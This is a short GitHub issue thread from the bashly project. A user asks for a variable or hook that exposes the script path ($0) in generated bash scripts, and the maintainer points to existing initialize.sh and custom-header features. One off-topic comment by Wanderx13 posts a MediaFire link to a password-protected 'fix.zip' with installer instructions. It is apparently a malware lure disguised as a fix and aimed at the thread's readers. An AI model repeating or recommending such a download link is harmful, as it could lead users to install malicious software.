### ISSUE TITLE
THIS_SCRIPT variable

### ISSUE THREAD

**Issue by pcrockett** [DannyBen/bashly#555]
### Description

It's pretty common for me to determine the location of my more trivial (non-Bashly) scripts using code like this:

```bash
SCRIPT_PATH="$(readlink -f "$0")"
```

However I don't see any way for me to inject code at the top level of the generated script where I have access to `$0` as set by Bash during script startup.

I have a couple ideas that could solve this problem for me:

1. Solve the problem very generically: Similarly to the `initialize.sh` function hook, create a `toplevel.sh` hook that allows users to add raw code (NOT wrapped in a function) just before the `run` function is called.
2. Solve the problem specifically: Populate a readonly `THIS_SCRIPT` variable at the top of the generated script via
    ```bash
    readonly THIS_SCRIPT="$0"
    ```

I lean a bit more toward option 2 personally. It would allow me to then write code like this:

```bash
FULL_SCRIPT_PATH="$(readlink -f "$THIS_SCRIPT")"
```

Though option 1 could admittedly be useful for reasons I haven't thought of yet.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DannyBen** [comment]
I am not following.

Having this in `initialize.sh`

```bash
THIS_SCRIPT="$0"
SCRIPT_PATH="$(readlink -f "$THIS_SCRIPT")"
```

Makes `$SCRIPT_PATH` available to you elsewhere.
How is your use case breaking this behavior?

**Comment by DannyBen** [comment]
And in addition, there is already something similar to a "top-level" partial:
https://bashly.dannyb.co/usage/writing-your-scripts/#custom-header

Just place an `src/header.sh`

**Comment by pcrockett** [comment]
🤦 Well that's silly.

I could have _sworn_ `$0` was modified for each function call, and was no longer the script name.

And I totally missed the custom header functionality.

Welp. Thanks for that. Carry on!

**Comment by DannyBen** [comment]
Sure thing. Any issue that closes without me having to work, is a good issue 😈
